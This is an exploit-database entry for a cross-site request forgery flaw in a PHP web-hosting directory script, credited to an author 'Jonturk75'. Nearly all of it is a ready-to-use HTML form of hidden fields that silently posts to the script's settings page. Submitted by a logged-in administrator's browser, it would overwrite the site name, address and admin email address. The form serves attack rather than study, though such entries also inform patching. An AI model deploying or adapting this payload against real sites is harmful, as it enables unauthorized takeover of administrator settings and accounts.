Advanced POWER Web Hosting Cross Site Request Forgery

`# Exploit Title: Advanced POWER Web Hosting CSRF  
# Author: Jonturk75  
# Vendor or Software Link: http://www.scripts.com/viewscript/advanced-power-web-hosting-directory-script-php/22752/  
# Category:: webapps  
# Demo : http://www.softbizscripts.com/scripts/hostdirectory/admin  
# Greetz: Inj3ct0r Exploit DataBase 1337day.com  
  
  
  
<form action="update_general_set.php" method="post" name="form123" id="form123" onSubmit="return Validator(this);" >  
<input name="sb_null_char" class="box1" id="recperpage3" value="- -" size="7" type="hidden">  
<input name="small_dlength" id="small_dlength" size="7" value="550" type="hidden">  
<input name="sb_expiry" id="sb_expiry" value="-1" onclick="handle_click(this.form);" type="hidden" checked>   
<input name="expiry_duration" id="expiry_duration" size="7" value="10000" disabled="disabled" type="hidden">  
<input name="max_period" id="max_period" value="-1" size="7" disabled="disabled" type="hidden">  
<input name="max_ext_period" id="max_ext_period2" value="0" size="7" disabled="disabled" type="hidden">  
<input name="sb_image_size" class="box1" id="recperpage3" value="60000" type="hidden">  
<input name="site_keywords" class="box1" id="site_keywords" value="rawebhosting" size="35" type="hidden">  
<input name="sitename" class="box1" id="sitename" value="welcome to rawebhosting.net" size="35" type="hidden">  
<input name="adminemail" class="box1" id="adminemail" value="[email protected]" size="35" type="hidden">  
<input name="siteaddrs" class="box1" id="siteaddrs" value="websiteadres.net" size="35" type="hidden">  
<input name="list1" id="list1" value="20671095.gif" size="20" readonly="readonly" type="hidden">   
<input name="btn_name2" value="Upload" onclick="attachment('list1')" type="hidden">   
<input name="buttonname2" value="Remove" onclick="removeattachment()" type="hidden">   
<input name="Submit2" class="submit" value="Update" type="submit">   
</form>  
  
  
`